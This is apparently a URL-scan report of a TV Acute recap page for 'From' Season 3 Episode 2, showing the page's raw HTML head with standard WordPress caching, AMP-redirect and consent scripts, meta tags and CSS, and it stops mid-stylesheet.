https://www.tvacute.com/from-season-3-episode-2-recap/

Submitted URL:
https://www.tvacute.com/from-season-3-episode-2-recap/
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 113 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

Console log messages · 1 found

Messages logged to the web console

HTML

The raw HTML body of the page

<!DOCTYPE html><!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]--><!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]--><!--[if gt IE 8]><!--><html lang="en-US" class=" td-md-is-chrome"><!--<![endif]--><head><meta charset="UTF-8"><script>if(navigator.userAgent.match(/MSIE|Internet Explorer/i)||navigator.userAgent.match(/Trident\/7\..*?rv:11/i)){var href=document.location.href;if(!href.match(/[?&]nowprocket/)){if(href.indexOf("?")==-1){if(href.indexOf("#")==-1){document.location.href=href+"?nowprocket=1"}else{document.location.href=href.replace("#","?nowprocket=1#")}}else{if(href.indexOf("#")==-1){document.location.href=href+"&nowprocket=1"}else{document.location.href=href.replace("#","&nowprocket=1#")}}}}</script><script>(()=>{class RocketLazyLoadScripts{constructor(){this.v="1.2.5.1",this.triggerEvents=["keydown","mousedown","mousemove","touchmove","touchstart","touchend","wheel"],this.userEventHandler=this.t.bind(this),this.touchStartHandler=this.i.bind(this),this.touchMoveHandler=this.o.bind(this),this.touchEndHandler=this.h.bind(this),this.clickHandler=this.u.bind(this),this.interceptedClicks=[],this.interceptedClickListeners=[],this.l(this),window.addEventListener("pageshow",(t=>{this.persisted=t.persisted,this.everythingLoaded&&this.m()})),document.addEventListener("DOMContentLoaded",(()=>{this.p()})),this.delayedScripts={normal:[],async:[],defer:[]},this.trash=[],this.allJQueries=[]}k(t){document.hidden?t.t():(this.triggerEvents.forEach((e=>window.addEventListener(e,t.userEventHandler,{passive:!0}))),window.addEventListener("touchstart",t.touchStartHandler,{passive:!0}),window.addEventListener("mousedown",t.touchStartHandler),document.addEventListener("visibilitychange",t.userEventHandler))}_(){this.triggerEvents.forEach((t=>window.removeEventListener(t,this.userEventHandler,{passive:!0}))),document.removeEventListener("visibilitychange",this.userEventHandler)}i(t){"HTML"!==t.target.tagName&&(window.addEventListener("touchend",this.touchEndHandler),window.addEventListener("mouseup",this.touchEndHandler),window.addEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.addEventListener("mousemove",this.touchMoveHandler),t.target.addEventListener("click",this.clickHandler),this.L(t.target,!0),this.M(t.target,"onclick","rocket-onclick"),this.C())}o(t){window.removeEventListener("touchend",this.touchEndHandler),window.removeEventListener("mouseup",this.touchEndHandler),window.removeEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.removeEventListener("mousemove",this.touchMoveHandler),t.target.removeEventListener("click",this.clickHandler),this.L(t.target,!1),this.M(t.target,"rocket-onclick","onclick"),this.O()}h(){window.removeEventListener("touchend",this.touchEndHandler),window.removeEventListener("mouseup",this.touchEndHandler),window.removeEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.removeEventListener("mousemove",this.touchMoveHandler)}u(t){t.target.removeEventListener("click",this.clickHandler),this.L(t.target,!1),this.M(t.target,"rocket-onclick","onclick"),this.interceptedClicks.push(t),t.preventDefault(),t.stopPropagation(),t.stopImmediatePropagation(),this.O()}D(){window.removeEventListener("touchstart",this.touchStartHandler,{passive:!0}),window.removeEventListener("mousedown",this.touchStartHandler),this.interceptedClicks.forEach((t=>{t.target.dispatchEvent(new MouseEvent("click",{view:t.view,bubbles:!0,cancelable:!0}))}))}l(t){EventTarget.prototype.addEventListenerBase=EventTarget.prototype.addEventListener,EventTarget.prototype.addEventListener=function(e,i,o){"click"!==e||t.windowLoaded||i===t.clickHandler||t.interceptedClickListeners.push({target:this,func:i,options:o}),(this||window).addEventListenerBase(e,i,o)}}L(t,e){this.interceptedClickListeners.forEach((i=>{i.target===t&&(e?t.removeEventListener("click",i.func,i.options):t.addEventListener("click",i.func,i.options))})),t.parentNode!==document.documentElement&&this.L(t.parentNode,e)}S(){return new Promise((t=>{this.T?this.O=t:t()}))}C(){this.T=!0}O(){this.T=!1}M(t,e,i){t.hasAttribute&&t.hasAttribute(e)&&(event.target.setAttribute(i,event.target.getAttribute(e)),event.target.removeAttribute(e))}t(){this._(this),"loading"===document.readyState?document.addEventListener("DOMContentLoaded",this.R.bind(this)):this.R()}p(){let t=[];document.querySelectorAll("script[type=rocketlazyloadscript][data-rocket-src]").forEach((e=>{let i=e.getAttribute("data-rocket-src");if(i&&0!==i.indexOf("data:")){0===i.indexOf("//")&&(i=location.protocol+i);try{const o=new URL(i).origin;o!==location.origin&&t.push({src:o,crossOrigin:e.crossOrigin||"module"===e.getAttribute("data-rocket-type")})}catch(t){}}})),t=[...new Map(t.map((t=>[JSON.stringify(t),t]))).values()],this.j(t,"preconnect")}async R(){this.lastBreath=Date.now(),this.P(this),this.F(this),this.q(),this.A(),this.I(),await this.U(this.delayedScripts.normal),await this.U(this.delayedScripts.defer),await this.U(this.delayedScripts.async);try{await this.W(),await this.H(this),await this.J()}catch(t){console.error(t)}window.dispatchEvent(new Event("rocket-allScriptsLoaded")),this.everythingLoaded=!0,this.S().then((()=>{this.D()})),this.N()}A(){document.querySelectorAll("script[type=rocketlazyloadscript]").forEach((t=>{t.hasAttribute("data-rocket-src")?t.hasAttribute("async")&&!1!==t.async?this.delayedScripts.async.push(t):t.hasAttribute("defer")&&!1!==t.defer||"module"===t.getAttribute("data-rocket-type")?this.delayedScripts.defer.push(t):this.delayedScripts.normal.push(t):this.delayedScripts.normal.push(t)}))}async B(t){if(await this.G(),!0!==t.noModule||!("noModule"in HTMLScriptElement.prototype))return new Promise((e=>{let i;function o(){(i||t).setAttribute("data-rocket-status","executed"),e()}try{if(navigator.userAgent.indexOf("Firefox/")>0||""===navigator.vendor)i=document.createElement("script"),[...t.attributes].forEach((t=>{let e=t.nodeName;"type"!==e&&("data-rocket-type"===e&&(e="type"),"data-rocket-src"===e&&(e="src"),i.setAttribute(e,t.nodeValue))})),t.text&&(i.text=t.text),i.hasAttribute("src")?(i.addEventListener("load",o),i.addEventListener("error",(function(){i.setAttribute("data-rocket-status","failed"),e()})),setTimeout((()=>{i.isConnected||e()}),1)):(i.text=t.text,o()),t.parentNode.replaceChild(i,t);else{const i=t.getAttribute("data-rocket-type"),n=t.getAttribute("data-rocket-src");i?(t.type=i,t.removeAttribute("data-rocket-type")):t.removeAttribute("type"),t.addEventListener("load",o),t.addEventListener("error",(function(){t.setAttribute("data-rocket-status","failed"),e()})),n?(t.removeAttribute("data-rocket-src"),t.src=n):t.src="data:text/javascript;base64,"+window.btoa(unescape(encodeURIComponent(t.text)))}}catch(i){t.setAttribute("data-rocket-status","failed"),e()}}));t.setAttribute("data-rocket-status","skipped")}async U(t){const e=t.shift();return e&&e.isConnected?(await this.B(e),this.U(t)):Promise.resolve()}I(){this.j([...this.delayedScripts.normal,...this.delayedScripts.defer,...this.delayedScripts.async],"preload")}j(t,e){var i=document.createDocumentFragment();t.forEach((t=>{const o=t.getAttribute&&t.getAttribute("data-rocket-src")||t.src;if(o){const n=document.createElement("link");n.href=o,n.rel=e,"preconnect"!==e&&(n.as="script"),t.getAttribute&&"module"===t.getAttribute("data-rocket-type")&&(n.crossOrigin=!0),t.crossOrigin&&(n.crossOrigin=t.crossOrigin),t.integrity&&(n.integrity=t.integrity),i.appendChild(n),this.trash.push(n)}})),document.head.appendChild(i)}P(t){let e={};function i(i,o){return e[o].eventsToRewrite.indexOf(i)>=0&&!t.everythingLoaded?"rocket-"+i:i}function o(t,o){!function(t){e[t]||(e[t]={originalFunctions:{add:t.addEventListener,remove:t.removeEventListener},eventsToRewrite:[]},t.addEventListener=function(){arguments[0]=i(arguments[0],t),e[t].originalFunctions.add.apply(t,arguments)},t.removeEventListener=function(){arguments[0]=i(arguments[0],t),e[t].originalFunctions.remove.apply(t,arguments)})}(t),e[t].eventsToRewrite.push(o)}function n(e,i){let o=e[i];e[i]=null,Object.defineProperty(e,i,{get:()=>o||function(){},set(n){t.everythingLoaded?o=n:e["rocket"+i]=o=n}})}o(document,"DOMContentLoaded"),o(window,"DOMContentLoaded"),o(window,"load"),o(window,"pageshow"),o(document,"readystatechange"),n(document,"onreadystatechange"),n(window,"onload"),n(window,"onpageshow")}F(t){let e;function i(e){return t.everythingLoaded?e:e.split(" ").map((t=>"load"===t||0===t.indexOf("load.")?"rocket-jquery-load":t)).join(" ")}function o(o){if(o&&o.fn&&!t.allJQueries.includes(o)){o.fn.ready=o.fn.init.prototype.ready=function(e){return t.domReadyFired?e.bind(document)(o):document.addEventListener("rocket-DOMContentLoaded",(()=>e.bind(document)(o))),o([])};const e=o.fn.on;o.fn.on=o.fn.init.prototype.on=function(){return this[0]===window&&("string"==typeof arguments[0]||arguments[0]instanceof String?arguments[0]=i(arguments[0]):"object"==typeof arguments[0]&&Object.keys(arguments[0]).forEach((t=>{const e=arguments[0][t];delete arguments[0][t],arguments[0][i(t)]=e}))),e.apply(this,arguments),this},t.allJQueries.push(o)}e=o}o(window.jQuery),Object.defineProperty(window,"jQuery",{get:()=>e,set(t){o(t)}})}async H(t){const e=document.querySelector("script[data-webpack]");e&&(await async function(){return new Promise((t=>{e.addEventListener("load",t),e.addEventListener("error",t)}))}(),await t.K(),await t.H(t))}async W(){this.domReadyFired=!0,await this.G(),document.dispatchEvent(new Event("rocket-readystatechange")),await this.G(),document.rocketonreadystatechange&&document.rocketonreadystatechange(),await this.G(),document.dispatchEvent(new Event("rocket-DOMContentLoaded")),await this.G(),window.dispatchEvent(new Event("rocket-DOMContentLoaded"))}async J(){await this.G(),document.dispatchEvent(new Event("rocket-readystatechange")),await this.G(),document.rocketonreadystatechange&&document.rocketonreadystatechange(),await this.G(),window.dispatchEvent(new Event("rocket-load")),await this.G(),window.rocketonload&&window.rocketonload(),await this.G(),this.allJQueries.forEach((t=>t(window).trigger("rocket-jquery-load"))),await this.G();const t=new Event("rocket-pageshow");t.persisted=this.persisted,window.dispatchEvent(t),await this.G(),window.rocketonpageshow&&window.rocketonpageshow({persisted:this.persisted}),this.windowLoaded=!0}m(){document.onreadystatechange&&document.onreadystatechange(),window.onload&&window.onload(),window.onpageshow&&window.onpageshow({persisted:this.persisted})}q(){const t=new Map;document.write=document.writeln=function(e){const i=document.currentScript;i||console.error("WPRocket unable to document.write this: "+e);const o=document.createRange(),n=i.parentElement;let s=t.get(i);void 0===s&&(s=i.nextSibling,t.set(i,s));const c=document.createDocumentFragment();o.setStart(c,0),c.appendChild(o.createContextualFragment(e)),n.insertBefore(c,s)}}async G(){Date.now()-this.lastBreath>45&&(await this.K(),this.lastBreath=Date.now())}async K(){return document.hidden?new Promise((t=>setTimeout(t))):new Promise((t=>requestAnimationFrame(t)))}N(){this.trash.forEach((t=>t.remove()))}static run(){const t=new RocketLazyLoadScripts;t.k(t)}}RocketLazyLoadScripts.run()})();</script>
<title>From Season 3 Episode 2 Recap</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="pingback" href="https://www.tvacute.com/xmlrpc.php">
<script type="text/javascript">
/* <![CDATA[ */
(()=>{var e={};e.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),function({ampUrl:n,isCustomizePreview:t,isAmpDevMode:r,noampQueryVarName:o,noampQueryVarValue:s,disabledStorageKey:i,mobileUserAgents:a,regexRegex:c}){if("undefined"==typeof sessionStorage)return;const d=new RegExp(c);if(!a.some((e=>{const n=e.match(d);return!(!n||!new RegExp(n[1],n[2]).test(navigator.userAgent))||navigator.userAgent.includes(e)})))return;e.g.addEventListener("DOMContentLoaded",(()=>{const e=document.getElementById("amp-mobile-version-switcher");if(!e)return;e.hidden=!1;const n=e.querySelector("a[href]");n&&n.addEventListener("click",(()=>{sessionStorage.removeItem(i)}))}));const g=r&&["paired-browsing-non-amp","paired-browsing-amp"].includes(window.name);if(sessionStorage.getItem(i)||t||g)return;const u=new URL(location.href),m=new URL(n);m.hash=u.hash,u.searchParams.has(o)&&s===u.searchParams.get(o)?sessionStorage.setItem(i,"1"):m.href!==u.href&&(window.stop(),location.replace(m.href))}({"ampUrl":"https:\/\/www.tvacute.com\/from-season-3-episode-2-recap\/?amp=1","noampQueryVarName":"noamp","noampQueryVarValue":"mobile","disabledStorageKey":"amp_mobile_redirect_disabled","mobileUserAgents":["Mobile","Android","Silk\/","Kindle","BlackBerry","Opera Mini","Opera Mobi"],"regexRegex":"^\\\/((?:.|\\n)+)\\\/([i]*)$","isCustomizePreview":false,"isAmpDevMode":false})})();
/* ]]> */
</script>

<meta name="google-site-verification" content="zDelnFEq53MKBI9bL5n9gYu07KUgFr3MX20X4-7E6wo">
<meta name="yandex-verification" content="57457b8faad228da">
<meta name="msvalidate.01" content="7BE7C88DD291604B1E8D405055496C8B">
<meta name="p:domain_verify" content="06e16a18ace1ab07b61887e1840b18f9">
<meta name="article:publisher" content="https://www.facebook.com/tvacute/">
<meta name="twitter:site" content="https://twitter.com/tvacute">
<meta name="twitter:creator" content="https://twitter.com/tvacute">
<meta name="norton-safeweb-site-verification" content="sj2q889lwmc1ihxuwkwo5lgdk635a3mw86b57xutremqra9w0esf449ggzu2j-l3sod0-6pf43sf1ko-lrknpttb97jt5-plzo1taypmigl01whhw4nfg16w1no73k0c">
<meta name="wot-verification" content="ecca7e09c4afd1bf902d">
<meta name="google-site-verification" content="zDelnFEq53MKBI9bL5n9gYu07KUgFr3MX20X4-7E6wo">
<meta name="msvalidate.01" content="7BE7C88DD291604B1E8D405055496C8B">
<meta name="norton-safeweb-site-verification" content="sj2q889lwmc1ihxuwkwo5lgdk635a3mw86b57xutremqra9w0esf449ggzu2j-l3sod0-6pf43sf1ko-lrknpttb97jt5-plzo1taypmigl01whhw4nfg16w1no73k0c">
<meta name="wot-verification" content="ecca7e09c4afd1bf902d">
<meta name="p:domain_verify" content="06e16a18ace1ab07b61887e1840b18f9">
<meta name="wot-verification" content="ecca7e09c4afd1bf902d">
<meta name="yandex-verification" content="57457b8faad228da">

<meta name="robots" content="index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1">
<link rel="icon" type="image/png" href="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/favicon-32x32-1.png&amp;nocache=1">
<script id="google_gtagjs-js-consent-mode-data-layer">
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('consent', 'default', {"ad_personalization":"denied","ad_storage":"denied","ad_user_data":"denied","analytics_storage":"denied","functionality_storage":"denied","security_storage":"denied","personalization_storage":"denied","region":["AT","BE","BG","CH","CY","CZ","DE","DK","EE","ES","FI","FR","GB","GR","HR","HU","IE","IS","IT","LI","LT","LU","LV","MT","NL","NO","PL","PT","RO","SE","SI","SK"],"wait_for_update":500});
window._googlesitekitConsentCategoryMap = {"statistics":["analytics_storage"],"marketing":["ad_storage","ad_user_data","ad_personalization"],"functional":["functionality_storage","security_storage"],"preferences":["personalization_storage"]};
window._googlesitekitConsents = {"ad_personalization":"denied","ad_storage":"denied","ad_user_data":"denied","analytics_storage":"denied","functionality_storage":"denied","security_storage":"denied","personalization_storage":"denied","region":["AT","BE","BG","CH","CY","CZ","DE","DK","EE","ES","FI","FR","GB","GR","HR","HU","IE","IS","IT","LI","LT","LU","LV","MT","NL","NO","PL","PT","RO","SE","SI","SK"],"wait_for_update":500}</script>


<link rel="canonical" href="https://www.tvacute.com/from-season-3-episode-2-recap/">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="From Season 3 Episode 2 Recap">
<meta name="twitter:description" content="Season 3 of FROM brings back the mystery and terror as strange and horrifying happenings keep haunting the locals of Fromville. The plot resumes with Tabitha Matthews (played by Catalina Sandino Moreno) awakening in a Camden, Maine hospital in the season opener, EPISODE 1 (“Shattered”). Though it seems as though she has left the terrifying […]">
<meta name="twitter:creator" content="@tvacute">
<meta name="twitter:site" content="@tvacute">
<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"NewsArticle","@id":"https://www.tvacute.com/from-season-3-episode-2-recap/#article","isPartOf":{"@id":"https://www.tvacute.com/from-season-3-episode-2-recap/"},"author":{"name":"Olivia Wilson","@id":"https://www.tvacute.com/#/schema/person/805a9b5c4c3ab61845e152dc546730fb"},"headline":"From Season 3 Episode 2 Recap and Ending Explained!","datePublished":"2024-09-29T06:56:36+00:00","dateModified":"2024-09-29T06:56:36+00:00","mainEntityOfPage":{"@id":"https://www.tvacute.com/from-season-3-episode-2-recap/"},"wordCount":1255,"publisher":{"@id":"https://www.tvacute.com/#organization"},"image":{"@id":"https://www.tvacute.com/from-season-3-episode-2-recap/#primaryimage"},"thumbnailUrl":"https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif","keywords":["From MGM","From Season 3 Episode 2","From Season 3 Episode 2 Recap","From Season 3 Episode 2 Recap and Ending Explained!","from season 3 episode 2 When We Go","From Season 3 Recap"],"articleSection":["Recap"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://www.tvacute.com/from-season-3-episode-2-recap/","url":"https://www.tvacute.com/from-season-3-episode-2-recap/","name":"From Season 3 Episode 2 Recap","isPartOf":{"@id":"https://www.tvacute.com/#website"},"primaryImageOfPage":{"@id":"https://www.tvacute.com/from-season-3-episode-2-recap/#primaryimage"},"image":{"@id":"https://www.tvacute.com/from-season-3-episode-2-recap/#primaryimage"},"thumbnailUrl":"https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif","datePublished":"2024-09-29T06:56:36+00:00","dateModified":"2024-09-29T06:56:36+00:00","breadcrumb":{"@id":"https://www.tvacute.com/from-season-3-episode-2-recap/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.tvacute.com/from-season-3-episode-2-recap/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.tvacute.com/from-season-3-episode-2-recap/#primaryimage","url":"https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif","contentUrl":"https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif","width":640,"height":360,"caption":"from season 3 episode 2 When We Go"},{"@type":"BreadcrumbList","@id":"https://www.tvacute.com/from-season-3-episode-2-recap/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.tvacute.com/"},{"@type":"ListItem","position":2,"name":"From Season 3 Episode 2 Recap and Ending Explained!"}]},{"@type":"WebSite","@id":"https://www.tvacute.com/#website","url":"https://www.tvacute.com/","name":"TV Acutte","description":"Movie &amp; TV Show News, Promos, Recap","publisher":{"@id":"https://www.tvacute.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.tvacute.com/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://www.tvacute.com/#organization","name":"TV Acute","url":"https://www.tvacute.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.tvacute.com/#/schema/logo/image/","url":"https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-pink1.png&amp;nocache=1","contentUrl":"https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-pink1.png&amp;nocache=1","width":880,"height":173,"caption":"TV Acute"},"image":{"@id":"https://www.tvacute.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/tvacute/","https://x.com/tvacute","https://www.instagram.com/imtvacute/","https://in.pinterest.com/tvacute/","https://www.youtube.com/channel/UCW_cart8wzCSUX879DUa6lw"]},{"@type":"Person","@id":"https://www.tvacute.com/#/schema/person/805a9b5c4c3ab61845e152dc546730fb","name":"Olivia Wilson","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.tvacute.com/#/schema/person/image/","url":"https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-96x96.jpg&amp;nocache=1","contentUrl":"https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-96x96.jpg&amp;nocache=1","caption":"Olivia Wilson"},"description":"Olivia Wilson is the senior news writer for TV Acute. She spends too much money on collectables and is enamored with movies, comics, and television series. She loves binge-watching and can spend hours talking about movies and TV shows. She can immerse herself into a good story no matter the genre or form and only come out from it when she's had her fill. When she's not writing, she's probably cooking or exploring new places. You can follow her daily exploits on Twitter and Facebook.","sameAs":["https://www.tvacute.com/","tvacute","https://x.com/tvacute"]}]}</script>

<link rel="dns-prefetch" href="//www.googletagmanager.com">
<link rel="alternate" type="application/rss+xml" title="TV Acutte - TV Recaps &amp; Reviews » Feed" href="https://www.tvacute.com/feed/">
<link rel="stylesheet" id="wp-block-library-css" href="https://www.tvacute.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2" type="text/css" media="all">
<style id="classic-theme-styles-inline-css" type="text/css">
/*! This file is auto-generated */
.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}
</style>
<style id="global-styles-inline-css" type="text/css">
:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 11px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 32px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--regular: 15px;--wp--preset--font-size--larger: 50px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: 